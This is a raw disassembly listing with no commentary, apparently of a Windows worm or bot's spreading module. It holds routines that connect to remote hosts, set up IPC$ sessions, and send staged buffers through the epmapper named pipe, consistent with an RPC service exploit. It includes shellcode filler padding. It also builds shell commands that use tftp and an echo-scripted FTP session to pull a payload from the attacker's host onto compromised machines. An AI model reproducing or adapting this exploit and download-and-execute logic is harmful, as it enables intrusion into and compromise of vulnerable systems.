push 90h
push eax
call sub_415390
mov esi, offset loc_4247D8
push esi
call sub_415B10
push eax
lea eax, [ebp+var_E70]
push esi
push eax
call sub_4153F0
lea eax, [ebp+var_10]
push eax
call sub_415B10
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_754]
push eax
call sub_4153F0
mov eax, dword_424FD8
add esp, 2Ch
mov [ebp+var_764], eax
loc_402BCA: ; CODE XREF: sub_40297A+1F7�j
push 0E29h
lea eax, [ebp+var_2CA4]
push 31h
push eax
call sub_415390
movsx eax, [ebp+var_1]
add esp, 0Ch
add eax, 4
mov esi, dword_4211F0
push 0
push eax
lea eax, [ebp+var_B0]
push eax
push [ebp+arg_BC]
call esi ; send
cmp eax, 0FFFFFFFFh
jnz short loc_402C0B
loc_402C04: ; CODE XREF: sub_40297A+2C2�j
; sub_40297A+2ED�j ...
xor al, al
jmp loc_402DCC
; ---------------------------------------------------------------------------
loc_402C0B: ; CODE XREF: sub_40297A+288�j
mov edi, dword_4211EC
mov ebx, 640h
push 0
lea eax, [ebp+var_740]
push ebx
push eax
push [ebp+arg_BC]
call edi ; recv
push 0
push 68h
push offset dword_424BF8
push [ebp+arg_BC]
call esi ; send
cmp eax, 0FFFFFFFFh
jz short loc_402C04
push 0
lea eax, [ebp+var_740]
push ebx
push eax
push [ebp+arg_BC]
call edi ; recv
push 0
push 0A0h
push offset dword_424C68
push [ebp+arg_BC]
call esi ; send
cmp eax, 0FFFFFFFFh
jz short loc_402C04
push 0
lea eax, [ebp+var_740]
push ebx
push eax
push [ebp+arg_BC]
call edi ; recv
cmp [ebp+arg_C0], 0
jz loc_402D37
push 68h
lea eax, [ebp+var_89B0]
push offset dword_424E28
push eax
call sub_4153F0
lea eax, [ebp+var_4800]
push 1B5Ah
push eax
lea eax, [ebp+var_8948]
push eax
call sub_4153F0
push 70h
lea eax, [ebp+var_68D8]
push offset dword_424E98
push eax
call sub_4153F0
lea eax, [ebp+var_376C]
push 0A5Eh
push eax
lea eax, [ebp+var_6868]
push eax
call sub_4153F0
push 84h
lea eax, [ebp+var_5DA4]
push offset dword_424F10
push eax
call sub_4153F0
add esp, 3Ch
lea eax, [ebp+var_89B0]
push 0
push 10FCh
push eax
push [ebp+arg_BC]
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_402C04
push 0
lea eax, [ebp+var_740]
push ebx
push eax
push [ebp+arg_BC]
call edi ; recv
push 0
push 0FDCh
lea eax, [ebp+var_68D8]
jmp short loc_402D8F
; ---------------------------------------------------------------------------
loc_402D37: ; CODE XREF: sub_40297A+308�j
push 7Ch
lea eax, [ebp+var_2CA4]
push offset dword_424D10
push eax
call sub_4153F0
lea eax, [ebp+var_F10]
push 7D0h
push eax
lea eax, [ebp+var_2C28]
push eax
call sub_4153F0
push 90h
lea eax, [ebp+var_2458]
push offset off_424D90
push eax
call sub_4153F0
add esp, 24h
and [ebp+var_1FAD], 0
lea eax, [ebp+var_2CA4]
push 0
push 0CF8h
loc_402D8F: ; CODE XREF: sub_40297A+3BB�j
push eax
push [ebp+arg_BC]
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_402C04
push 12Ch
call dword_421060 ; Sleep
sub esp, 0BCh
lea esi, [ebp+arg_0]
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_40282F
add esp, 0BCh
test al, al
setnz al
loc_402DCC: ; CODE XREF: sub_40297A+28C�j
pop edi
pop esi
pop ebx
leave
retn
sub_40297A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402DD1 proc near ; CODE XREF: .text:00403E41�p
var_858 = byte ptr -858h
var_814 = byte ptr -814h
var_218 = byte ptr -218h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_14 = byte ptr 1Ch
arg_A0 = dword ptr 0A8h
arg_A8 = dword ptr 0B0h
arg_B0 = dword ptr 0B8h
push ebp
mov ebp, esp
sub esp, 858h
push ebx
push esi
push edi
xor edi, edi
push 10h
lea eax, [ebp+var_18]
push edi
push eax
mov [ebp+var_8], edi
call sub_415390
add esp, 0Ch
lea eax, [ebp+arg_4]
mov [ebp+var_18], 2
push eax
call dword_4211DC ; inet_addr
push [ebp+arg_A0]
mov [ebp+var_14], eax
call dword_4211E0 ; ntohs
push 6
push 1
push 2
mov [ebp+var_16], ax
call dword_4211E4 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp+var_4], esi
jz loc_402ECE
lea eax, [ebp+var_18]
push 10h
push eax
push esi
call dword_4211E8 ; connect
cmp eax, 0FFFFFFFFh
jz loc_402ECE
mov ebx, dword_4211F0
push edi
push 89h
push offset dword_424970
push esi
call ebx ; send
cmp eax, 0FFFFFFFFh
jz short loc_402ECE
push edi
mov edi, 640h
lea eax, [ebp+var_858]
push edi
push eax
push esi
mov esi, dword_4211EC
call esi ; recv
push 0
push 0A8h
push offset dword_424A00
push [ebp+var_4]
call ebx ; send
cmp eax, 0FFFFFFFFh
jz short loc_402ECE
push 0
lea eax, [ebp+var_858]
push edi
push eax
push [ebp+var_4]
call esi ; recv
push 0
push 0DEh
push offset dword_424AB0
push [ebp+var_4]
call ebx ; send
cmp eax, 0FFFFFFFFh
jz short loc_402ECE
mov ebx, [ebp+var_4]
push 0
lea eax, [ebp+var_858]
push edi
push eax
push ebx
call esi ; recv
movsx eax, [ebp+var_814]
sub eax, 30h
jz short loc_402ED9
dec eax
jz short loc_402ED5
loc_402ECE: ; CODE XREF: sub_402DD1+57�j
; sub_402DD1+6D�j ...
xor eax, eax
jmp loc_402F6F
; ---------------------------------------------------------------------------
loc_402ED5: ; CODE XREF: sub_402DD1+FB�j
push 0
jmp short loc_402EFD
; ---------------------------------------------------------------------------
loc_402ED9: ; CODE XREF: sub_402DD1+F8�j
push 2
push ebx
sub esp, 0BCh
lea esi, [ebp+arg_0]
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_40297A
add esp, 0C4h
test al, al
jnz short loc_402F1D
push 1
loc_402EFD: ; CODE XREF: sub_402DD1+106�j
push ebx
lea esi, [ebp+arg_0]
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_40297A
add esp, 0C4h
test al, al
jz short loc_402F24
loc_402F1D: ; CODE XREF: sub_402DD1+128�j
mov [ebp+var_8], 1
loc_402F24: ; CODE XREF: sub_402DD1+14A�j
push ebx
call dword_4211F4 ; closesocket
cmp [ebp+var_8], 0
jz short loc_402F6C
push 0
lea eax, [ebp+var_218]
push [ebp+arg_B0]
push eax
lea eax, [ebp+arg_14]
push eax
push [ebp+arg_0]
call sub_412BD1
lea eax, [ebp+var_218]
push eax
call sub_40B078
mov eax, [ebp+arg_A8]
add esp, 18h
imul eax, 3Ch
lea eax, dword_427390[eax]
inc dword ptr [eax]
loc_402F6C: ; CODE XREF: sub_402DD1+15E�j
xor eax, eax
inc eax
loc_402F6F: ; CODE XREF: sub_402DD1+FF�j
pop edi
pop esi
pop ebx
leave
retn
sub_402DD1 endp
; ---------------------------------------------------------------------------
push ebx
push esi
push edi
lea esi, [esp+10h]
sub esp, 0BCh
mov dword ptr [esp+16Ch], 87h
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_4033B6
push 2Fh
lea esi, [esp+0D0h]
pop ecx
mov dword ptr [esp+16Ch], 1BDh
mov edi, esp
mov ebx, eax
rep movsd
call sub_403C74
add esp, 0BCh
test ebx, ebx
jnz short loc_402FC6
test eax, eax
jz short loc_402FC9
loc_402FC6: ; CODE XREF: .text:00402FC0�j
xor eax, eax
inc eax
loc_402FC9: ; CODE XREF: .text:00402FC4�j
pop edi
pop esi
pop ebx
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402FCD proc near ; CODE XREF: sub_4033B6+28�p
var_354 = byte ptr -354h
var_34E = byte ptr -34Eh
var_124 = byte ptr -124h
var_123 = byte ptr -123h
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 354h
push ebx
push esi
push edi
mov esi, offset aIpc ; "\\IPC$"
lea edi, [ebp+var_C]
mov ecx, 8Ah
movsd
movsd
movsd
mov esi, offset asc_425638 ; "\\\\"
lea edi, [ebp+var_354]
movsd
movsw
xor eax, eax
lea edi, [ebp+var_34E]
rep stosd
stosw
mov al, byte_43B658
push 45h
mov [ebp+var_124], al
pop ecx
xor eax, eax
lea edi, [ebp+var_123]
rep stosd
stosw
stosb
lea eax, [ebp+var_124]
push 0FFh
push eax
push 0FFFFFFFFh
push [ebp+arg_0]
xor edi, edi
push edi
push edi
call dword_421064 ; MultiByteToWideChar
lea eax, [ebp+var_124]
push eax
lea eax, [ebp+var_354]
push eax
call sub_415BBF
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_354]
push eax
call sub_415BBF
mov esi, [ebp+arg_4]
lea eax, [ebp+var_354]
add esp, 10h
mov [esi+14h], eax
mov eax, offset dword_43B654
push edi
push eax
push eax
push esi
mov [esi+4], edi
mov [esi+10h], edi
mov [esi+1Ch], edi
call dword_43CAC4
cmp eax, 5
mov ebx, 4C3h
jz short loc_403091
cmp eax, ebx
jnz short loc_40309B
loc_403091: ; CODE XREF: sub_402FCD+BE�j
push edi
push edi
push edi
push esi
call dword_43CAC4
loc_40309B: ; CODE XREF: sub_402FCD+C2�j
cmp eax, 5
jz short loc_4030A9
cmp eax, ebx
jz short loc_4030A9
xor eax, eax
inc eax
jmp short loc_4030AB
; ---------------------------------------------------------------------------
loc_4030A9: ; CODE XREF: sub_402FCD+D1�j
; sub_402FCD+D5�j
xor eax, eax
loc_4030AB: ; CODE XREF: sub_402FCD+DA�j
pop edi
pop esi
pop ebx
leave
retn
sub_402FCD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4030B0 proc near ; CODE XREF: sub_4033B6+7A�p
; sub_4033B6+15A�p
var_354 = byte ptr -354h
var_34E = byte ptr -34Eh
var_124 = byte ptr -124h
var_123 = byte ptr -123h
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 354h
push esi
push edi
mov esi, offset aIpc ; "\\IPC$"
lea edi, [ebp+var_C]
movsd
movsd
movsd
mov esi, offset asc_425638 ; "\\\\"
lea edi, [ebp+var_354]
movsd
movsw
mov ecx, 8Ah
xor eax, eax
lea edi, [ebp+var_34E]
push 45h
rep stosd
stosw
mov al, byte_43B658
pop ecx
mov [ebp+var_124], al
xor eax, eax
lea edi, [ebp+var_123]
push 0FFh
rep stosd
stosw
stosb
lea eax, [ebp+var_124]
xor esi, esi
push eax
push 0FFFFFFFFh
push [ebp+arg_0]
push esi
push esi
call dword_421064 ; MultiByteToWideChar
lea eax, [ebp+var_124]
push eax
lea eax, [ebp+var_354]
push eax
call sub_415BBF
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_354]
push eax
call sub_415BBF
add esp, 10h
jmp short loc_40314E
; ---------------------------------------------------------------------------
loc_403143: ; CODE XREF: sub_4030B0+AF�j
push 7D0h
call dword_421060 ; Sleep
loc_40314E: ; CODE XREF: sub_4030B0+91�j
push esi
lea eax, [ebp+var_354]
push esi
push eax
call dword_43C964
test eax, eax
jnz short loc_403143
pop edi
inc eax
pop esi
leave
retn
sub_4030B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403166 proc near ; CODE XREF: sub_4033B6+A6�p
; sub_4033B6+1E7�p
var_3004 = byte ptr -3004h
var_2004 = byte ptr -2004h
var_1FE0 = byte ptr -1FE0h
var_1FD4 = byte ptr -1FD4h
var_1F2D = byte ptr -1F2Dh
var_1004 = byte ptr -1004h
var_FFC = dword ptr -0FFCh
var_FF4 = dword ptr -0FF4h
var_F84 = dword ptr -0F84h
var_F80 = dword ptr -0F80h
var_F50 = dword ptr -0F50h
var_F4C = dword ptr -0F4Ch
var_F34 = dword ptr -0F34h
var_E78 = dword ptr -0E78h
var_CA4 = dword ptr -0CA4h
var_C9C = dword ptr -0C9Ch
var_C94 = byte ptr -0C94h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_BC = dword ptr 0C4h
arg_C0 = dword ptr 0C8h
arg_C4 = dword ptr 0CCh
push ebp
mov ebp, esp
mov eax, 3004h
call sub_415B90
push esi
push edi
push offset byte_42C2B4
mov esi, 0A7h
push [ebp+arg_0]
mov [ebp+var_4], esi
call sub_40A08A
pop ecx
push eax
lea eax, [ebp+var_3004]
push 1000h
push eax
call sub_414C51
mov edi, eax
add esp, 10h
test edi, edi
jz loc_4033B2
push ebx
mov ebx, offset aFxnbfxfxnbfxfx ; "FXNBFXFXNBFXFXFXFX"
push 30h
lea eax, [ebp+var_2004]
push ebx
push eax
call sub_4153F0
push esi
lea eax, [ebp+var_1FD4]
push 0FFFFFF90h
push eax
call sub_415390
lea eax, [ebp+var_3004]
push edi
push eax
lea eax, [ebp+var_1F2D]
push eax
call sub_4153F0
lea esi, [edi+0D7h]
jmp short loc_403228
; ---------------------------------------------------------------------------
loc_4031EA: ; CODE XREF: sub_403166+D0�j
mov esi, [ebp+var_4]
push 30h
lea eax, [ebp+var_2004]
inc esi
push ebx
push eax
mov [ebp+var_4], esi
call sub_4153F0
push esi
lea eax, [ebp+var_1FD4]
push 0FFFFFF90h
push eax
call sub_415390
lea eax, [ebp+var_3004]
push edi
push eax
lea eax, [ebp+esi+var_1FD4]
push eax
call sub_4153F0
lea esi, [esi+edi+30h]
loc_403228: ; CODE XREF: sub_403166+82�j
add esp, 24h
mov eax, esi
cdq
push 10h
pop ecx
idiv ecx
cmp edx, 0Ch
jnz short loc_4031EA
cmp [ebp+arg_C4], 0
jz short loc_403253
cmp [ebp+arg_C0], 3
jz short loc_40325C
cmp [ebp+arg_C0], 0
jmp short loc_40325A
; ---------------------------------------------------------------------------
loc_403253: ; CODE XREF: sub_403166+D9�j
cmp [ebp+arg_C0], 3
loc_40325A: ; CODE XREF: sub_403166+EB�j
jnz short loc_403265
loc_40325C: ; CODE XREF: sub_403166+E2�j
push 4
push offset dword_425634
jmp short loc_40326C
; ---------------------------------------------------------------------------
loc_403265: ; CODE XREF: sub_403166:loc_40325A�j
push 4
push offset dword_425630
loc_40326C: ; CODE XREF: sub_403166+FD�j
lea eax, [ebp+var_1FE0]
push eax
call sub_4153F0
add esp, 0Ch
lea eax, [ebp+var_1004]
push 360h
push offset dword_425168
push eax
call sub_4153F0
push 10h
lea eax, [ebp+var_CA4]
push offset dword_4254CC
push eax
call sub_4153F0
lea eax, [ebp+var_2004]
push esi
push eax
lea eax, [ebp+var_C94]
push eax
call sub_4153F0
lea edi, [esi+370h]
push 3Ch
push offset off_4254E0
lea eax, [ebp+edi+var_1004]
push eax
call sub_4153F0
add edi, 3Ch
push 30h
push offset dword_425520
lea eax, [ebp+edi+var_1004]
push eax
call sub_4153F0
mov eax, esi
add edi, 30h
cdq
sub eax, edx
sar eax, 1
add [ebp+var_CA4], eax
add [ebp+var_C9C], eax
mov eax, [ebp+var_FFC]
lea eax, [eax+esi-0Ch]
mov [ebp+var_FFC], eax
mov eax, [ebp+var_FF4]
lea eax, [eax+esi-0Ch]
mov [ebp+var_FF4], eax
mov eax, [ebp+var_F84]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F84], eax
mov eax, [ebp+var_F80]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F80], eax
mov eax, [ebp+var_F50]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F50], eax
mov eax, [ebp+var_F4C]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F4C], eax
mov eax, [ebp+var_F34]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F34], eax
mov eax, [ebp+var_E78]
lea eax, [eax+esi-0Ch]
lea esi, [edi+1]
push esi
mov [ebp+var_E78], eax
call sub_415BE9
add esp, 40h
mov ebx, eax
push esi
push 0
push ebx
call sub_415390
lea eax, [ebp+var_1004]
push edi
push eax
push ebx
call sub_4153F0
mov eax, [ebp+arg_BC]
add esp, 18h
mov [eax], edi
mov eax, ebx
pop ebx
loc_4033B2: ; CODE XREF: sub_403166+3E�j
pop edi
pop esi
leave
retn
sub_403166 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4033B6 proc near ; CODE XREF: .text:00402F93�p
; sub_4076CB+1D7�p
; DATA XREF: ...
var_1338 = byte ptr -1338h
var_338 = byte ptr -338h
var_138 = byte ptr -138h
var_34 = byte ptr -34h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_14 = byte ptr 1Ch
arg_A0 = dword ptr 0A8h
arg_A8 = dword ptr 0B0h
arg_B0 = dword ptr 0B8h
arg_B4 = dword ptr 0BCh
push ebp
mov ebp, esp
mov eax, 1338h
call sub_415B90
cmp [ebp+arg_A0], 1BDh
push ebx
push esi
push edi
jnz loc_403524
lea eax, [ebp+var_34]
push eax
lea eax, [ebp+arg_4]
push eax
call sub_402FCD
pop ecx
test eax, eax
pop ecx
jz loc_403634
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_138]
push offset aSPipeEpmapper ; "\\\\%s\\pipe\\epmapper"
push eax
call sub_415316
add esp, 0Ch
xor ebx, ebx
lea eax, [ebp+var_138]
push ebx
push 80h
push 3
push ebx
push 1
push 0C0000000h
push eax
call dword_421078 ; CreateFileA
mov [ebp+var_4], eax
cmp eax, 0FFFFFFFFh
lea eax, [ebp+arg_4]
jnz short loc_40343B
loc_40342F: ; CODE XREF: sub_4033B6+126�j
push eax
call sub_4030B0
pop ecx
jmp loc_403634
; ---------------------------------------------------------------------------
loc_40343B: ; CODE XREF: sub_4033B6+77�j
push 2
push eax
call sub_412A1D
pop ecx
lea esi, [ebp+arg_0]
pop ecx
push 1
push eax
lea eax, [ebp+var_10]
push eax
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_403166
add esp, 0C8h
cmp eax, ebx
mov [ebp+var_8], eax
jz short loc_4034D0
mov edi, 186A0h
push edi
call sub_415BE9
mov esi, eax
push edi
push ebx
push esi
call sub_415390
add esp, 10h
lea eax, [ebp+var_C]
mov edi, 2710h
push ebx
push eax
push edi
push esi
push 48h
push offset dword_425118
push [ebp+var_4]
call dword_421074 ; TransactNamedPipe
cmp byte ptr [esi+2], 0Ch
jnz short loc_4034C0
lea eax, [ebp+var_14]
push ebx
push eax
push [ebp+var_10]
push [ebp+var_8]
push [ebp+var_4]
call dword_421070 ; WriteFile
test eax, eax
jnz short loc_4034E1
loc_4034C0: ; CODE XREF: sub_4033B6+F0�j
push esi
call sub_415C9B
push [ebp+var_8]
call sub_415C9B
pop ecx
pop ecx
loc_4034D0: ; CODE XREF: sub_4033B6+B6�j
push [ebp+var_4]
call dword_42106C ; CloseHandle
lea eax, [ebp+arg_4]
jmp loc_40342F
; ---------------------------------------------------------------------------
loc_4034E1: ; CODE XREF: sub_4033B6+108�j
lea eax, [ebp+var_C]
push ebx
push eax
push edi
push esi
push [ebp+var_4]
call dword_421068 ; ReadFile
push [ebp+var_8]
mov edi, eax
call sub_415C9B
push esi
call sub_415C9B
pop ecx
pop ecx
push [ebp+var_4]
call dword_42106C ; CloseHandle
lea eax, [ebp+arg_4]
push eax
call sub_4030B0
cmp edi, 1
pop ecx
jnz loc_403645
jmp loc_403634
; ---------------------------------------------------------------------------
loc_403524: ; CODE XREF: sub_4033B6+1A�j
lea eax, [ebp+arg_4]
push 1
push eax
call sub_412A1D
mov esi, eax
pop ecx
cmp esi, 1
pop ecx
jz loc_403634
xor ebx, ebx
push ebx
push 1
push 2
call dword_43CAA4 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_403634
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_415390
add esp, 0Ch
mov [ebp+var_24], 2
push [ebp+arg_A0]
call dword_43CA24 ; ntohs
mov [ebp+var_22], ax
lea eax, [ebp+arg_4]
push eax
call dword_43CA64 ; inet_addr
mov [ebp+var_20], eax
push ebx
lea eax, [ebp+var_C]
push esi
push eax
lea esi, [ebp+arg_0]
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_403166
mov esi, eax
add esp, 0C8h
cmp esi, ebx
mov [ebp+var_8], esi
jnz short loc_4035B6
push [ebp+var_4]
jmp short loc_40362E
; ---------------------------------------------------------------------------
loc_4035B6: ; CODE XREF: sub_4033B6+1F9�j
mov edi, [ebp+var_4]
lea eax, [ebp+var_24]
push 10h
push eax
push edi
call dword_43C9CC ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_4035CE
loc_4035CB: ; CODE XREF: sub_4033B6+22A�j
push esi
jmp short loc_403627
; ---------------------------------------------------------------------------
loc_4035CE: ; CODE XREF: sub_4033B6+213�j
push ebx
push 48h
push offset dword_425118
push edi
call dword_43CA74 ; send
cmp eax, 0FFFFFFFFh
jz short loc_4035CB
mov esi, 1000h
push ebx
lea eax, [ebp+var_1338]
push esi
push eax
push edi
call dword_43CA3C ; recv
push ebx
push [ebp+var_C]
push [ebp+var_8]
push edi
call dword_43CA74 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40360F
push [ebp+var_8]
jmp short loc_403627
; ---------------------------------------------------------------------------
loc_40360F: ; CODE XREF: sub_4033B6+252�j
push ebx
lea eax, [ebp+var_1338]
push esi
push eax
push edi
call dword_43CA3C ; recv
push [ebp+var_8]
cmp eax, 0FFFFFFFFh
jnz short loc_403638
loc_403627: ; CODE XREF: sub_4033B6+216�j
; sub_4033B6+257�j
call sub_415C9B
pop ecx
push edi
loc_40362E: ; CODE XREF: sub_4033B6+1FE�j
call dword_43CABC ; closesocket
loc_403634: ; CODE XREF: sub_4033B6+31�j
; sub_4033B6+80�j ...
xor eax, eax
jmp short loc_4036B1
; ---------------------------------------------------------------------------
loc_403638: ; CODE XREF: sub_4033B6+26F�j
call sub_415C9B
pop ecx
push edi
call dword_43CABC ; closesocket
loc_403645: ; CODE XREF: sub_4033B6+163�j
xor esi, esi
loc_403647: ; CODE XREF: sub_4033B6+2B1�j
lea eax, [ebp+var_338]
push eax
call sub_40B158
test eax, eax
pop ecx
jnz short loc_40366B
push 1388h
call dword_421060 ; Sleep
inc esi
cmp esi, 6
jl short loc_403647
jmp short loc_4036AE
; ---------------------------------------------------------------------------
loc_40366B: ; CODE XREF: sub_4033B6+2A0�j
cmp [ebp+arg_B4], ebx
jnz short loc_403690
push ebx
lea eax, [ebp+var_338]
push [ebp+arg_B0]
push eax
lea eax, [ebp+arg_14]
push eax
push [ebp+arg_0]
call sub_412BD1
add esp, 14h
loc_403690: ; CODE XREF: sub_4033B6+2BB�j
lea eax, [ebp+var_338]
push eax
call sub_40B078
mov eax, [ebp+arg_A8]
pop ecx
imul eax, 3Ch
lea eax, dword_427390[eax]
inc dword ptr [eax]
loc_4036AE: ; CODE XREF: sub_4033B6+2B3�j
xor eax, eax
inc eax
loc_4036B1: ; CODE XREF: sub_4033B6+280�j
pop edi
pop esi
pop ebx
leave
retn
sub_4033B6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4036B6 proc near ; DATA XREF: .text:00423004�o
jmp $+5
sub_4036B6 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4036BB proc near
push 0BB80h
push 76Ch
call sub_413F12
pop ecx
mov dword_43B65C, eax
pop ecx
retn
sub_4036BB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4036D2 proc near ; CODE XREF: sub_403833+42C�p
var_5A0 = byte ptr -5A0h
var_1A0 = byte ptr -1A0h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 5A0h
push ebx
push esi
push edi
xor esi, esi
push 10h
lea eax, [ebp+var_10]
push esi
push eax
call sub_415390
add esp, 0Ch
lea eax, [ebp+arg_4]
mov [ebp+var_10], 2
push eax
call dword_43CA64 ; inet_addr
mov [ebp+var_C], eax
mov ax, word ptr dword_43B65C
push eax
call dword_43CA24 ; ntohs
push esi
push 1
push 2
mov [ebp+var_E], ax
call dword_43CAA4 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_40380C
lea eax, [ebp+var_10]
push 10h
push eax
push ebx
call dword_43C9CC ; connect
cmp eax, 0FFFFFFFFh
jz loc_40380C
push esi
lea eax, [ebp+var_5A0]
push 400h
push eax
push ebx
call dword_43CA3C ; recv
mov esi, offset byte_42C2B4
push esi
push esi
push [ebp+arg_0]
call sub_40A08A
pop ecx
mov edi, 190h
push eax
push offset aTftpISGetS ; "tftp -i %s get %s\r\n"
lea eax, [ebp+var_1A0]
push edi
push eax
call sub_41588A
add esp, 18h
push esi
push esi
push dword_43B670
push [ebp+arg_0]
call sub_40A08A
pop ecx
push eax
push offset aEchoOpenSDOEch ; "echo open %s %d > o&echo user 1 1 >> o "...
lea eax, [ebp+var_1A0]
push edi
push eax
call sub_41588A
add esp, 1Ch
lea eax, [ebp+var_1A0]
push 0
push eax
call sub_415B10
pop ecx
push eax
lea eax, [ebp+var_1A0]
push eax
push ebx
call dword_43CA74 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40380C
push 1F4h
call dword_421060 ; Sleep
push esi
push offset dword_425090
lea eax, [ebp+var_1A0]
push edi
push eax
call sub_41588A
add esp, 10h
lea eax, [ebp+var_1A0]
push 0
push eax
call sub_415B10
pop ecx
push eax
lea eax, [ebp+var_1A0]
push eax
push ebx
call dword_43CA74 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_403810
loc_40380C: ; CODE XREF: sub_4036D2+51�j
; sub_4036D2+67�j ...
xor al, al
jmp short loc_40382E
; ---------------------------------------------------------------------------
loc_403810: ; CODE XREF: sub_4036D2+138�j
push 0
lea eax, [ebp+var_5A0]
push 400h
push eax
push ebx
call dword_43CA3C ; recv
push ebx
call dword_43CABC ; closesocket
mov al, 1
loc_40382E: ; CODE XREF: sub_4036D2+13C�j
pop edi
pop esi
pop ebx
leave
retn
sub_4036D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403833 proc near ; CODE XREF: sub_403C74+125�p
; sub_403C74+147�p
var_89B4 = byte ptr -89B4h
var_894C = byte ptr -894Ch
var_68DC = byte ptr -68DCh
var_686C = byte ptr -686Ch
var_5DA8 = byte ptr -5DA8h
var_4804 = byte ptr -4804h
var_4803 = byte ptr -4803h
var_3770 = byte ptr -3770h
var_2CAC = byte ptr -2CACh
var_2CAB = byte ptr -2CABh
var_2CA8 = byte ptr -2CA8h
var_2C2C = byte ptr -2C2Ch
var_245C = byte ptr -245Ch
var_1FB1 = byte ptr -1FB1h
var_1CC4 = byte ptr -1CC4h
var_14E0 = byte ptr -14E0h
var_14D0 = byte ptr -14D0h
var_11AC = byte ptr -11ACh
var_11A8 = byte ptr -11A8h
var_119C = byte ptr -119Ch
var_F14 = byte ptr -0F14h
var_E74 = byte ptr -0E74h
var_768 = dword ptr -768h
var_758 = byte ptr -758h
var_744 = byte ptr -744h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_B4 = byte ptr -0B4h
var_B1 = byte ptr -0B1h
var_87 = byte ptr -87h
var_85 = byte ptr -85h
var_84 = byte ptr -84h
var_3C = byte ptr -3Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = dword ptr -6
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = byte ptr 8
arg_4 = byte ptr 0Ch
arg_BC = dword ptr 0C4h
arg_C0 = dword ptr 0C8h
push ebp
mov ebp, esp
mov eax, 89B4h
call sub_415B90
mov eax, dword_425110
push ebx
mov [ebp+var_10], eax
mov eax, dword_425114
mov [ebp+var_C], eax
push esi
lea eax, [ebp+arg_4]
push edi
push eax
lea eax, [ebp+var_3C]
push offset loc_425104
push eax
call sub_415316
add esp, 0Ch
xor ebx, ebx
xor eax, eax
loc_40386C: ; CODE XREF: sub_403833+4F�j
mov cl, [ebp+eax+var_3C]
mov [ebp+eax*2+var_103], bl
mov [ebp+eax*2+var_104], cl
inc eax
cmp eax, 28h
jl short loc_40386C
push 60h
lea eax, [ebp+var_B4]
push offset dword_425B58
push eax
call sub_4153F0
lea eax, [ebp+var_3C]
push eax
call sub_415B10
add eax, eax
push eax
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_84]
push eax
call sub_4153F0
add esp, 1Ch
lea eax, [ebp+var_3C]
push 9
push (offset aC_0+3)
push eax
call sub_415B10
pop ecx
lea eax, [ebp+eax*2+var_85]
push eax
call sub_4153F0
lea eax, [ebp+var_3C]
push eax
call sub_415B10
add al, 1Ah
push 1
add al, al
mov [ebp+var_1], al
lea eax, [ebp+var_1]
push eax
lea eax, [ebp+var_B1]
push eax
call sub_4153F0
lea eax, [ebp+var_3C]
push eax
call sub_415B10
add al, al
push 1
add al, 9
mov [ebp+var_2], al
lea eax, [ebp+var_2]
push eax
lea eax, [ebp+var_87]
push eax
call sub_4153F0
mov ax, word ptr dword_43B65C
add esp, 2Ch
push eax
call dword_43CA24 ; ntohs
xor eax, 9999h
push 2
mov [ebp+var_6], eax
lea eax, [ebp+var_6]
push eax
push offset dword_425850
call sub_4153F0
add esp, 0Ch
cmp [ebp+arg_C0], ebx
jz loc_403A31
mov edi, 0DACh
lea eax, [ebp+var_1CC4]
push edi
push 90h
